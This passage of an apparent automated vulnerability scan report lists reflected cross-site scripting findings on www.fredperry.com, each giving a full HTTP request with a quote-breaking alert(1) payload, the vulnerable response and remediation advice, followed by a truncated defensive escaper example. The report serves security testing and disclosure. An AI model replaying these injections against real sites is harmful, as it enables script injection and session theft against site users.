The sink here is the Google Analytics call pageTracker._trackPageview("..."), whose argument the server builds from the request URI; the same sink appears in every finding in this section, on the 404 template as well as on category pages. Echoing user-controllable data within a script context is inherently dangerous, so the application should stop building that string from the request: either omit the argument, so ga.js derives the path client-side from window.location, or pass the URI through a JavaScript-string escaper that encodes the double quote, backslash, angle brackets, ampersand and line terminators (including U+2028 and U+2029) as \xHH or \uHHHH sequences. HTML entity encoding is not a substitute inside a script block, where the HTML parser does not decode entities.

Request

GET /limited-edition/men/collaboration-raf-simons-centenary-outfitf2872"-alert(1)-"429b7d0d03a/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:13:41 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=m9t2nujfnbq882ma058gmk5hq3; expires=Tue, 09-Nov-2010 17:13:42 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29397

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/men/collaboration-raf-simons-centenary-outfitf2872"-alert(1)-"429b7d0d03a/");
//]]>
...[SNIP]...

1.101. http://www.fredperry.com/limited-edition/men/collaboration-raf-simons-centenary-outfit/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/collaboration-raf-simons-centenary-outfit/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 911a8"-alert(1)-"6872c7ca1c6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

The sink here is the Google Analytics call pageTracker._trackPageview("..."), whose argument the server builds from the request URI; the same sink appears in every finding in this section, on the 404 template as well as on category pages. Echoing user-controllable data within a script context is inherently dangerous, so the application should stop building that string from the request: either omit the argument, so ga.js derives the path client-side from window.location, or pass the URI through a JavaScript-string escaper that encodes the double quote, backslash, angle brackets, ampersand and line terminators (including U+2028 and U+2029) as \xHH or \uHHHH sequences. HTML entity encoding is not a substitute inside a script block, where the HTML parser does not decode entities.

Request

GET /limited-edition/men/collaboration-raf-simons-centenary-outfit/?911a8"-alert(1)-"6872c7ca1c6=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:12:10 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=tq0lkqj1ku5kt3qfsve5dv2lu0; expires=Tue, 09-Nov-2010 17:12:10 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29400

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/men/collaboration-raf-simons-centenary-outfit/?911a8"-alert(1)-"6872c7ca1c6=1");
//]]>
...[SNIP]...

1.102. http://www.fredperry.com/limited-edition/men/collaboration-raf-simons/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/collaboration-raf-simons/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 27e13"-alert(1)-"1e1df12ea80 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

The sink here is the Google Analytics call pageTracker._trackPageview("..."), whose argument the server builds from the request URI; the same sink appears in every finding in this section, on the 404 template as well as on category pages. Echoing user-controllable data within a script context is inherently dangerous, so the application should stop building that string from the request: either omit the argument, so ga.js derives the path client-side from window.location, or pass the URI through a JavaScript-string escaper that encodes the double quote, backslash, angle brackets, ampersand and line terminators (including U+2028 and U+2029) as \xHH or \uHHHH sequences. HTML entity encoding is not a substitute inside a script block, where the HTML parser does not decode entities.

Request

GET /limited-edition27e13"-alert(1)-"1e1df12ea80/men/collaboration-raf-simons/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:08:15 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=4hofbk9rao1b3tbe0ko177upb5; expires=Tue, 09-Nov-2010 17:08:15 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29380

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition27e13"-alert(1)-"1e1df12ea80/men/collaboration-raf-simons/");
//]]>
...[SNIP]...

1.103. http://www.fredperry.com/limited-edition/men/collaboration-raf-simons/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/collaboration-raf-simons/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 29976"-alert(1)-"56522880a08 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

The sink here is the Google Analytics call pageTracker._trackPageview("..."), whose argument the server builds from the request URI; the same sink appears in every finding in this section, on the 404 template as well as on category pages. Echoing user-controllable data within a script context is inherently dangerous, so the application should stop building that string from the request: either omit the argument, so ga.js derives the path client-side from window.location, or pass the URI through a JavaScript-string escaper that encodes the double quote, backslash, angle brackets, ampersand and line terminators (including U+2028 and U+2029) as \xHH or \uHHHH sequences. HTML entity encoding is not a substitute inside a script block, where the HTML parser does not decode entities.

Request

GET /limited-edition/men29976"-alert(1)-"56522880a08/collaboration-raf-simons/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:08:35 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=h3d2v4e6cnf09ine2ihuj62p74; expires=Tue, 09-Nov-2010 17:08:35 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29380

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/men29976"-alert(1)-"56522880a08/collaboration-raf-simons/");
//]]>
...[SNIP]...

1.104. http://www.fredperry.com/limited-edition/men/collaboration-raf-simons/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/collaboration-raf-simons/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c8f7b"-alert(1)-"9130791ac77 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

The sink here is the Google Analytics call pageTracker._trackPageview("..."), whose argument the server builds from the request URI; the same sink appears in every finding in this section, on the 404 template as well as on category pages. Echoing user-controllable data within a script context is inherently dangerous, so the application should stop building that string from the request: either omit the argument, so ga.js derives the path client-side from window.location, or pass the URI through a JavaScript-string escaper that encodes the double quote, backslash, angle brackets, ampersand and line terminators (including U+2028 and U+2029) as \xHH or \uHHHH sequences. HTML entity encoding is not a substitute inside a script block, where the HTML parser does not decode entities.

Request

GET /limited-edition/men/collaboration-raf-simonsc8f7b"-alert(1)-"9130791ac77/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:09:03 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=f4lees3sdljodl2notjhfc64m1; expires=Tue, 09-Nov-2010 17:09:03 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29380

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/men/collaboration-raf-simonsc8f7b"-alert(1)-"9130791ac77/");
//]]>
...[SNIP]...

1.105. http://www.fredperry.com/limited-edition/men/collaboration-raf-simons/ [SID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/collaboration-raf-simons/

Issue detail

The value of the SID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b6089"-alert(1)-"78f69521811 was submitted in the SID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

The sink here is the Google Analytics call pageTracker._trackPageview("..."), whose argument the server builds from the request URI; the same sink appears in every finding in this section, on the 404 template as well as on category pages. Echoing user-controllable data within a script context is inherently dangerous, so the application should stop building that string from the request: either omit the argument, so ga.js derives the path client-side from window.location, or pass the URI through a JavaScript-string escaper that encodes the double quote, backslash, angle brackets, ampersand and line terminators (including U+2028 and U+2029) as \xHH or \uHHHH sequences. HTML entity encoding is not a substitute inside a script block, where the HTML parser does not decode entities.

Request

GET /limited-edition/men/collaboration-raf-simons/?SID=2hPWQxiLpIPJPjREOVJiLvolj/gt24Tjf99vflOKNYQ=b6089"-alert(1)-"78f69521811 HTTP/1.1
Host: www.fredperry.com
Proxy-Connection: keep-alive
Referer: http://fredperry.com/home/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.194CKOLO; __utma=119066206.1815755339.1289339096.1289339096.1289349290.2; __utmc=119066206; __utmb=119066206.3.10.1289349290

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 18:36:11 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=23llskiairskf7nqs63bm7fup7; expires=Tue, 09-Nov-2010 19:36:11 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 32771

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Fred Pe
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/men/collaboration-raf-simons/?SID=2hPWQxiLpIPJPjREOVJiLvolj/gt24Tjf99vflOKNYQ=b6089"-alert(1)-"78f69521811");
//]]>
...[SNIP]...

1.106. http://www.fredperry.com/limited-edition/men/collaboration-raf-simons/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/collaboration-raf-simons/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 753ab"-alert(1)-"f5f7eed41f2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

The sink here is the Google Analytics call pageTracker._trackPageview("..."), whose argument the server builds from the request URI; the same sink appears in every finding in this section, on the 404 template as well as on category pages. Echoing user-controllable data within a script context is inherently dangerous, so the application should stop building that string from the request: either omit the argument, so ga.js derives the path client-side from window.location, or pass the URI through a JavaScript-string escaper that encodes the double quote, backslash, angle brackets, ampersand and line terminators (including U+2028 and U+2029) as \xHH or \uHHHH sequences. HTML entity encoding is not a substitute inside a script block, where the HTML parser does not decode entities.

Request

GET /limited-edition/men/collaboration-raf-simons/?753ab"-alert(1)-"f5f7eed41f2=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:07:43 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=1r8bdethkco9bag8hd3biug112; expires=Tue, 09-Nov-2010 17:07:43 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 32725

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Fred Pe
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/men/collaboration-raf-simons/?753ab"-alert(1)-"f5f7eed41f2=1");
//]]>
...[SNIP]...

1.107. http://www.fredperry.com/limited-edition/men/footwear/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/footwear/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 979cb"-alert(1)-"bd24e099cfd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

The sink here is the Google Analytics call pageTracker._trackPageview("..."), whose argument the server builds from the request URI; the same sink appears in every finding in this section, on the 404 template as well as on category pages. Echoing user-controllable data within a script context is inherently dangerous, so the application should stop building that string from the request: either omit the argument, so ga.js derives the path client-side from window.location, or pass the URI through a JavaScript-string escaper that encodes the double quote, backslash, angle brackets, ampersand and line terminators (including U+2028 and U+2029) as \xHH or \uHHHH sequences. HTML entity encoding is not a substitute inside a script block, where the HTML parser does not decode entities.

Request

GET /limited-edition979cb"-alert(1)-"bd24e099cfd/men/footwear/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:12:38 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=b5ovimaq1a269sva272fjhn656; expires=Tue, 09-Nov-2010 17:12:38 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29364

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition979cb"-alert(1)-"bd24e099cfd/men/footwear/");
//]]>
...[SNIP]...

1.108. http://www.fredperry.com/limited-edition/men/footwear/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/footwear/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7bc3d"-alert(1)-"169d283a576 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

The sink here is the Google Analytics call pageTracker._trackPageview("..."), whose argument the server builds from the request URI; the same sink appears in every finding in this section, on the 404 template as well as on category pages. Echoing user-controllable data within a script context is inherently dangerous, so the application should stop building that string from the request: either omit the argument, so ga.js derives the path client-side from window.location, or pass the URI through a JavaScript-string escaper that encodes the double quote, backslash, angle brackets, ampersand and line terminators (including U+2028 and U+2029) as \xHH or \uHHHH sequences. HTML entity encoding is not a substitute inside a script block, where the HTML parser does not decode entities.

Request

GET /limited-edition/men7bc3d"-alert(1)-"169d283a576/footwear/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:13:03 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=im80s9cq1u9q59qolfhjvgc0a6; expires=Tue, 09-Nov-2010 17:13:03 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29364

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/men7bc3d"-alert(1)-"169d283a576/footwear/");
//]]>
...[SNIP]...

1.109. http://www.fredperry.com/limited-edition/men/footwear/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/footwear/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bc2b9"-alert(1)-"be53c83d711 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

The sink here is the Google Analytics call pageTracker._trackPageview("..."), whose argument the server builds from the request URI; the same sink appears in every finding in this section, on the 404 template as well as on category pages. Echoing user-controllable data within a script context is inherently dangerous, so the application should stop building that string from the request: either omit the argument, so ga.js derives the path client-side from window.location, or pass the URI through a JavaScript-string escaper that encodes the double quote, backslash, angle brackets, ampersand and line terminators (including U+2028 and U+2029) as \xHH or \uHHHH sequences. HTML entity encoding is not a substitute inside a script block, where the HTML parser does not decode entities.

Request

GET /limited-edition/men/footwearbc2b9"-alert(1)-"be53c83d711/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:13:37 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=494opmqoclu78ed6ptci9eaf06; expires=Tue, 09-Nov-2010 17:13:37 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29364

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/men/footwearbc2b9"-alert(1)-"be53c83d711/");
//]]>
...[SNIP]...

1.110. http://www.fredperry.com/limited-edition/men/footwear/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/footwear/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9e0e7"-alert(1)-"38b1976be02 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

The sink here is the Google Analytics call pageTracker._trackPageview("..."), whose argument the server builds from the request URI; the same sink appears in every finding in this section, on the 404 template as well as on category pages. Echoing user-controllable data within a script context is inherently dangerous, so the application should stop building that string from the request: either omit the argument, so ga.js derives the path client-side from window.location, or pass the URI through a JavaScript-string escaper that encodes the double quote, backslash, angle brackets, ampersand and line terminators (including U+2028 and U+2029) as \xHH or \uHHHH sequences. HTML entity encoding is not a substitute inside a script block, where the HTML parser does not decode entities.

Request

GET /limited-edition/men/footwear/?9e0e7"-alert(1)-"38b1976be02=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:11:10 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=ajbvr9uubhd1p5n43a8ciqg5o6; expires=Tue, 09-Nov-2010 17:11:10 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 39990

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Fred Pe
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/men/footwear/?9e0e7"-alert(1)-"38b1976be02=1");
//]]>
...[SNIP]...
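Added example, not code from this report or from the site under test. Every finding in this section (1.97 through 1.111, REST path segments, arbitrary parameter names and the SID value alike) lands in one sink: the request URI spliced into the double-quoted argument of pageTracker._trackPageview(). The two render functions below are assumed stand-ins for that server-side template, which the report does not show; the escaper is the fix described in the remediation detail; and the harness evaluates each rendered snippet with alert and pageTracker stubbed so the outcome is observable rather than a popup. The canary is the one from finding 1.110.

```javascript
// Added example: unsafe vs. escaped rendering of the _trackPageview() argument.
// renderTrackerUnsafe/renderTrackerSafe are assumed stand-ins for the server
// template (not shown in the report); jsStringEscape is the proposed fix.

// Escape a value for use inside a double-quoted JavaScript string literal that
// sits in an HTML <script> block. Only alphanumerics and a few URL punctuation
// characters pass through; everything else becomes \xHH or \uHHHH, so neither
// the JS lexer (quote, backslash, line terminators, U+2028/U+2029) nor the
// HTML parser ("</script>") can find a delimiter in the output.
function jsStringEscape(value) {
  const s = String(value);
  let out = '';
  for (let i = 0; i < s.length; i++) {
    const ch = s[i];
    if (/[A-Za-z0-9\/._~?=:-]/.test(ch)) {
      out += ch;
      continue;
    }
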